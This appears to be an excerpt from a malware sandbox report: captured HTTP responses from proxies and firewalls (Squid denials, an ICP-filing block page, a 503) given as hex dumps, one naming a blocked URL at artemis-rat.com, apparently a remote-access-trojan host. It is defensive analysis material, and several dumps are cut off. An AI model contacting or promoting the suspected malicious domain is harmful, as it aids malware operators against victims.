                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:14 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service Unavailablecontent-length: 107cache-control: no-cachecontent-type: text/htmlData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.28Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:17 GMTContent-Type: text/html;charset=utf-8Content-Length: 952X-Squid-Error: ERR_ACCESS_DENIED 0Content-Language: enX-Cache: MISS from ah_testVia: 1.1 ah_test (squid/3.5.28)Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 53
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: closeContent-Type: text/htmlCache-Control: no-cacheX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffContent-Length: 4872Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 38 3b 20 49 45 3d 45 44 47 45 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 52 6f 62 6f 74 6f 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 36 61 36 61 36 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 70 75 74 5b 74 79 70 65 3d 64 61 74 65 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 65 6d 61 69 6c 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 6e 75 6d 62 65 72 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 70 61 73 73 77 6f 72 64 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 6c 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 78 74 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 69 6d 65 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 75 72 6c 5d 2c 20 73 65 6c 65 63 74 2c 20 74 65 78 74 61 72 65 61 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 36 32 36 32 36 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:19 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
